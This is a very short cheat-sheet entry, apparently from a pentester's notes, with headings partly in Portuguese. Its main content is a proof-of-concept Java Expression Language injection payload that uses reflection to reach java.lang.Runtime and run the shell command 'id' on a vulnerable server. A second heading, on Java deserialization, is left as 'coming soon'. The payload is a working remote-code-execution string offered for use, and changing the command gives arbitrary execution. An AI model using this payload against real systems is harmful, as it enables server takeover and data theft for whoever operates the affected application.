Java

EXPRESSION LANGUAGE INJECTION RCE

Prova de Conceito de Command Injection:

${"".getClass().forName("java.lang.Runtime").getMethods()[6].invoke("".getClass().forName("jav
a.lang.Runtime")).exec("id")}

JAVA DESSERIALIZATION

comming soon... 😏